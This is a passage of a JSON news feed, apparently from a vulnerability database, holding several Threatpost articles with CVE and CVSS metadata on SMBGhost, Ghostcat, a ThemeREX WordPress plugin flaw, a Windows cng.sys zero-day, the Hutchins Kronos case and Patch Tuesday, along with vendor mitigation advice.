agreement](<https://www.documentcloud.org/documents/5972658-Marcus-Hutchins-plea-agreement.html>) in April pleading guilty to charges relating to the creation of the Kronos malware. 
The [plea agreement ](<https://threatpost.com/wannacry-hero-pleads-guilty-to-kronos-malware-charges/143997/>)admitted guilt to two of 10 counts in the Eastern District of Wisconsin on Friday \u2013 one charge for distributing Kronos and the other charge for conspiracy.\n\nOn the heels of his plea agreement, Hutchins faced up to 10 years in prison and $500,000 in fines, according to court documents.\n\nAfter Hutchins was first detained August 2017 in Nevada \u2013 a week after attending Black Hat and DEF CON \u2013 [reaction](<https://threatpost.com/marcus-hutchins-only-certainty-is-uncertainty/127270/>) to his arrest was mixed. The U.K. malware researcher has been hailed by many as the so-called \u201cWannaCry Hero\u201d because he discovered a way to knock down the WannaCry [ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) just as it had started to rapidly spread, infecting at least 200,000 systems and bringing global businesses to a halt.\n\nHutchins was hailed as a hero during the global [WannaCry outbreak in 2017](<https://threatpost.com/wannacry-bitcoin-withdrawn-killswitch-researcher-detained-in-nevada/127182/>). His analysis of the ransomware uncovered a hardcoded killswitch domain that the malware beaconed out to. Hutchins\u2019 purchased the domain for around $10 and by doing so likely spared the U.S. 
from suffering significant impact at the hands of WannaCry.\n\nWannaCry is blamed for infecting more than 200,000 endpoints in 150 countries, causing billions of dollars in damages and grinding global business to a halt.\n", "cvss3": {}, "published": "2019-07-29T13:23:34", "type": "threatpost", "title": "\u2018WannaCry Hero\u2019 Avoids Jail Time in Kronos Malware Charges", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2019-07-29T13:23:34", "id": "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "href": "https://threatpost.com/wannacry-hero-avoids-jail-time-in-kronos-malware-charges/146721/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-11T18:04:34", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis introduces an access-control problem, the researcher noted. 
In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there\u2019s also a functionality used to get parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot of this is that adversaries can use various WordPress functions \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. 
Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd earlier in February, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/?utm_source=rss&utm_medium=rss&utm_campaign=themerex-wordpress-plugin-remote-code-execution", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-03-23T21:04:36", "description": "A vulnerability in the popular Apache Tomcat web server is ripe for active attack, thanks to a proof-of-concept (PoC) exploit making an appearance on GitHub. 
The now-patched bug affects Tomcat versions 7.0, 8.5 and 9.0.\n\nAccording to Flashpoint analysts Cheng Lu and Steven Ouellette, an exploit for the \u201cGhostcat\u201d security bug (tracked as [CVE-2020-1938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938>) and first publicly disclosed Feb. 20) reliably allows information disclosure via file retrieval on a vulnerable server \u2013 without authentication or a user being tricked into a compromising interaction. And, in some situations, it could allow remote code execution, they said.\n\n\u201cDue to the nature of the vulnerability, [the exploit] can be leveraged without any user interactions and with high reliability, with low chance of causing the vulnerable server to crash,\u201d explained the researchers, [in a posting](<https://www.flashpoint-intel.com/blog/ghostcat/>) on Friday. The duo said they\u2019ve confirmed that the PoC works.\n\n**The Bug**\n\nThe Apache Tomcat open-source web server supports various JavaScript-based technologies, including the Apache JServ Protocol (AJP) interface, which is where the vulnerability resides.\n\nThe AJP binary protocol \u2013 in essence a connector \u2013 allows the Tomcat servlet container, which is called Catalina, to communicate out to web applications to support extended functionalities for websites.\n\n\u201cThe AJP connector handles inbound requests [from applications] and passes to Catalina,\u201d wrote Lu and Ouellette. \u201cCatalina then passes the request to the proper web application and receives the dynamically generated content. 
This content is then sent back over the network by the AJP connector as the response to the request.\u201d\n\nThis connector is \u201chighly trusted\u2026and should not be exposed over an untrusted network, as it may be leveraged to gain complete access to the application server,\u201d the researchers warned, adding that it \u201cis expected to be exposed only internally.\u201d\n\nHowever, in a default Tomcat installation on Windows 10, Tomcat\u2019s AJP port, on 8009, is exposed \u2013 allowing outside users to interact with and gain access to the Tomcat server itself. The PoC exploit demonstrates how this state of affairs can be used to expose files.\n\nThe PoC code, written in Python, is capable of creating and sending an AJP request to a specified IP address, with a valid file path and name that the attacker would like to receive. A vulnerable server will return the file as a stream back to the PoC code, displaying it on the attacker\u2019s screen. Where the requested file is not a plain text file, the output stream can be saved and opened with an appropriate application.\n\n\u201cThrough the AJP connector, an attacker can retrieve arbitrary files from Tomcat\u2019s web root, including the files residing within the \u2018WEB-INF\u2019 and \u2018META-INF\u2019 directories through the ServletContext.getResourceAsStream() function,\u201d according to the Flashpoint posting. \u201cAdditionally, arbitrary files within the web application on the vulnerable Tomcat server can be processed as a JSP page through the AJP connector.\u201d\n\n**Remote Code Execution**\n\nThe bug does open the door to RCE, according to the researchers. If a vulnerable Tomcat server also allows file uploads (not the default setting, by the way), an attacker could upload their own code via the AJP connector.\n\nHowever, there\u2019s a big catch. To accomplish RCE, an attacker would need to find a web application that accepts file uploads that is running on a vulnerable Tomcat server. 
Attackers can\u2019t themselves simply change the server settings to allow file uploads.\n\n\u201cThe file-upload requirement can only be implemented by the web application developer, rather than the attacker,\u201d according to the analysis. \u201cFor this reason, only a portion of the vulnerable Tomcat servers may suffer the code-execution impact from this vulnerability.\u201d\n\nFurther, the publicly available PoC code doesn\u2019t support execution of files on a vulnerable server even with the prerequisites in place. \u201cHowever, such capability can be implemented on the basis of the PoC code with relative ease,\u201d the researchers warned.\n\n**Mitigation**\n\nWeb admins should update their Apache Tomcat instances to version 8.5.51 to avoid becoming victims; or, if they don\u2019t make use of AJP connectors, they can simply disable them, Lu and Ouellette noted. \u201cUsers can also consider exposing the connector only in the trusted network segment, rather than exposing it to the entire network, to reduce attack surface,\u201d they added.\n\nOtherwise, the barrier to exploitation is very low \u2013 so businesses should brace for attacks.\n\n\u201cPublicly available PoC and exploit code make the exploitation of this vulnerability more accessible to threat actors of all skill levels. The mass scan activities could identify internet-facing instances of Tomcat susceptible to attacks. 
Therefore, Flashpoint analysts assess with moderate confidence that this vulnerability may see active exploitation attempts in the coming days in a more targeted fashion.\u201d\n", "cvss3": {}, "published": "2020-03-23T20:56:37", "type": "threatpost", "title": "Apache Tomcat Exploit Poised to Pounce, Stealing Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-1938"], "modified": "2020-03-23T20:56:37", "id": "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "href": "https://threatpost.com/apache-tomcat-exploit-stealing-files/154055/?utm_source=rss&utm_medium=rss&utm_campaign=apache-tomcat-exploit-stealing-files", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:27:36", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix an SMBv3 wormable bug on Thursday that leaked earlier this week. The patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. 
This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. 
We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. 
However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. 
Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "href": "https://threatpost.com/wormable-unpatched-microsoft-bug/153632/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-02T15:57:19", "description": "A high-severity Windows driver bug is being exploited in the wild as a zero-day. 
It allows local privilege escalation and sandbox escape.\n\nThe security vulnerability [was disclosed](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2104>) by Google Project Zero just seven days after it was reported, since cybercriminals are already exploiting it, according to researchers.\n\nThe flaw (CVE-2020-17087) has to do with the way the Windows Kernel Cryptography Driver (cng.sys) processes input/output control (IOCTL), which is a system call for device-specific input/output operations and other operations that cannot be expressed by regular system calls.\n\n\u201c[Cng.sys] exposes a \\Device\\CNG device to user-mode programs and supports a variety of IOCTLs with non-trivial input structures,\u201d according to the bug report, published on Friday. \u201cWe have identified a vulnerability in the processing of IOCTL 0x390400, reachable through [a] series of calls.\u201d\n\nWith specially crafted requests, an attacker can trigger a pool-based buffer overflow, which leads to a system crash and opens the door for exploitation.\n\n\u201cThe bug resides in the cng!CfgAdtpFormatPropertyBlock function and is caused by a 16-bit integer truncation issue,\u201d the Project Zero team explained. \u201cThe integer overflow occurs in line 2, and if SourceLength is equal to or greater than 0x2AAB, an inadequately small buffer is allocated from the NonPagedPool in line 3. It is subsequently overflown by the binary-to-hex conversion loop in lines 5-10 by a multiple of 65536 bytes.\u201d\n\nThe team put together a proof-of-concept exploit that shows the ease of triggering an attack. 
It worked on an up-to-date build of Windows 10 1903 (64-bit), but researchers said that the bug appears to affect Windows versions going back to Windows 7.\n\n\u201cA crash is easiest to reproduce with Special Pools enabled for cng.sys, but even in the default configuration the corruption of 64kB of kernel data will almost surely crash the system shortly after running the exploit,\u201d according to Project Zero.\n\nThe director of Google\u2019s Threat Analysis Group, Shane Huntley, said in the disclosure that the attacks are targeted and unrelated to any U.S. election-related targeting. Another Project Zero team member noted that Microsoft is expected to fix the bug on its next Patch Tuesday update, on Nov. 10.\n\nSome quibbled with the short disclosure timeline, but Project Zero researchers Ben Hawkes and Tavis Ormandy defended the move on Twitter:\n\n> The quick take: we think there's defensive utility to sharing these details, and that opportunistic attacks using these details between now and the patch being released is reasonably unlikely (so far it's been used as part of an exploit chain, and the entry-point attack is fixed)\n> \n> \u2014 Ben Hawkes (@benhawkes) [October 30, 2020](<https://twitter.com/benhawkes/status/1322211779028557824?ref_src=twsrc%5Etfw>)\n\nOrmandy [noted](<https://twitter.com/taviso/status/1322219253878026241>), \u201cYour attack is more likely to be detected if you attempt to use documented vulnerabilities, because people know what to look for. The other details of your attack will then be analyzed.\u201d\n\nMateusz Jurczyk and Sergei Glazunov of Google Project Zero were credited with finding the bug.\n", "cvss3": {}, "published": "2020-11-02T14:57:02", "type": "threatpost", "title": "Unpatched Windows Zero-Day Exploited in the Wild for Sandbox Escape", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-17087"], "modified": "2020-11-02T14:57:02", "id": "THREATPOST:2AAD8D184B893593E4E3B11FE31F97B3", "href": "https://threatpost.com/unpatched-windows-zero-day-exploited-sandbox-escape/160828/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:14", "description": "The release of a fully functional proof-of-concept (PoC) exploit for a critical, wormable remote code-execution (RCE) vulnerability in Windows could spark a wave of cyberattacks, the feds have warned.\n\nMicrosoft patched the bug tracked as [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) back in March; also known as SMBGhost or CoronaBlue, it affects Windows 10 and Windows Server 2019. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol \u2013 the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/wannacry-infested-laptop-art-auction/144992/>) in 2017. 
SMB is a file-sharing system that allows multiple clients to access shared folders, and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection.\n\nIn this case, the bug is an integer overflow vulnerability in the SMBv3.1.1 message decompression routine of the kernel driver srv2.sys.\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\n\u201cAlthough Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber-actors are targeting unpatched systems with the new PoC, according to recent open-source reports,\u201d [warned](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>) the Cybersecurity and Infrastructure Security Agency (CISA) on Friday. \u201cCISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n\nThe author behind the PoC, who goes by \u201cChompie,\u201d announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) last week on Twitter. Several replies followed the original post, confirming that the exploit does in fact work.\n\n> This was a pain \ud83d\ude02. But I was able to achieve RCE with CVE 2020-0796 [#SMBGhost](<https://twitter.com/hashtag/SMBGhost?src=hash&ref_src=twsrc%5Etfw>). 
[pic.twitter.com/mvQ0YQt9GT](<https://t.co/mvQ0YQt9GT>)\n> \n> \u2014 chompie (@chompie1337) [June 1, 2020](<https://twitter.com/chompie1337/status/1267327689213517825?ref_src=twsrc%5Etfw>)\n\nThe PoC is notable because it achieves RCE \u2013 previous attempts to exploit SMBGhost have resulted only in denial of service or local privilege escalation, according to security analysts.\n\n\u201cWhile there have already been many public reports and PoCs of LPE (Local Privilege Escalation), none of them have shown that RCE is actually possible so far,\u201d said researchers at Ricerca Security, who did [a full writeup](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) of Chompie\u2019s exploit. \u201cThis is probably because remote kernel exploitation is very different from local exploitation in that an attacker can\u2019t utilize useful OS functions such as creating userland processes, referring to PEB, and issuing system calls.\u201d\n\nWindows 10 also has specific mitigations that make RCE a much more difficult thing to achieve, they noted.\n\n\u201cIn the latest version of Windows 10, RCE became extremely challenging owing to almost flawless address randomization,\u201d the researchers explained. \u201cIn a nutshell, we defeat this mitigation by abusing MDL (memory descriptor list)s, structs frequently used in kernel drivers for Direct Memory Access. By forging this struct, we make it possible to read from \u2018physical\u2019 memory. As basically no exception will occur when reading physical memory locations, we obtain a stable read primitive.\u201d\n\nTo protect networks, administrators should apply the updates; Microsoft also has offered [workaround guidance](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for those that can\u2019t patch. 
For instance, on the server side, companies can disable SMBv3 compression to block unauthenticated attackers, using a PowerShell command: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force. No reboot is necessary.\n\nTo protect unpatched SMB clients, Microsoft [noted that it\u2019s possible](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to block traffic via firewalls and other methods. Companies can for instance simply block TCP port 445 at the enterprise perimeter firewall (though systems could still be vulnerable to attacks from within their enterprise perimeter).\n", "cvss3": {}, "published": "2020-06-08T15:54:41", "type": "threatpost", "title": "SMBGhost RCE Exploit Threatens Corporate Networks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-06-08T15:54:41", "id": "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "href": "https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offers critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. 
In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d\n\nThe researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe 
report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. 
And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:24:13", "description": "Microsoft has released patches for 129 vulnerabilities as part of its June Patch Tuesday updates \u2013 the highest number of CVEs ever released by Microsoft in a single month.\n\nWithin the blockbuster security update, 11 critical remote code-execution flaws were patched in Windows, SharePoint server, Windows Shell, VBScript and other products. 
Unlike other [recent monthly updates](<https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/>) from Microsoft, its [June updates](<https://portal.msrc.microsoft.com/en-us/security-guidance>) did not include any zero-day vulnerabilities being actively attacked in the wild.\n\n\u201cFor June, Microsoft released patches for 129 CVEs covering Microsoft Windows, Internet Explorer (IE), Microsoft Edge (EdgeHTML-based and Chromium-based in IE Mode), ChakraCore, Office and Microsoft Office Services and Web Apps, Windows Defender, Microsoft Dynamics, Visual Studio, Azure DevOps, and Microsoft Apps for Android,\u201d according to Dustin Childs, with Trend Micro\u2019s Zero Day Initiative, [in a Tuesday post](<https://www.thezdi.com/blog/2020/6/9/the-june-2020-security-update-review>). \u201cThis brings the total number of Microsoft patches released this year to 616 \u2013 just 49 shy of the total number of CVEs they addressed in all of 2017.\u201d\n\nMicrosoft\u2019s June Patch Tuesday volume beats out the update from May, where it [released fixes for 111](<https://threatpost.com/microsoft-111-bugs-may-patch-tuesday/155669/>) security flaws, including 16 critical bugs and 96 that are rated important.\n\n## **SMBv3 Flaws**\n\nSatnam Narang, staff research engineer at Tenable, told Threatpost that a trio of fixes stuck out in the Patch Tuesday updates, for flaws in Microsoft Server Message Block (SMB). Two of these flaws exist in Microsoft Server Message Block 3.1.1 (SMBv3). 
All three vulnerabilities are notable because they\u2019re rated as \u201cexploitation more likely\u201d based on Microsoft\u2019s Exploitability Index.\n\nThe two flaws in SMBv3 include a denial-of-service vulnerability (CVE-2020-1284) and an information-disclosure vulnerability (CVE-2020-1206), both of which can be exploited by a remote, authenticated attacker.\n\nNarang said the flaws \u201cfollow in the footsteps\u201d of [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>), a \u201cwormable\u201d remote code execution flaw in SMBv3 that was patched back in March, dubbed \u201cSMBGhost.\u201d CISA recently warned that the release of a fully [functional proof-of-concept](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) (PoC) for SMBGhost could soon spark a wave of cyberattacks.\n\nThe third vulnerability patched in Microsoft SMB, [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>), is a remote code-execution vulnerability that exists in the way SMBv1 handles requests. To exploit the flaw, an attacker would need to be authenticated and to send a specially crafted packet to a targeted SMBv1 server.\n\nNarang said this flaw \u201cmight create a sense of d\u00e9j\u00e0 vu\u201d for another remote code-execution vulnerability in SMBv1, [EternalBlue](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>), which was used in the [WannaCry 2017 ransomware attacks.](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>)\n\n\u201cHowever, the difference between these two is that EternalBlue could be exploited by an unauthenticated attacker, whereas this flaw requires authentication, according to Microsoft,\u201d he said. \u201cThis vulnerability affects Windows 7 and Windows 2008, both of which reached their end of support in January 2020. 
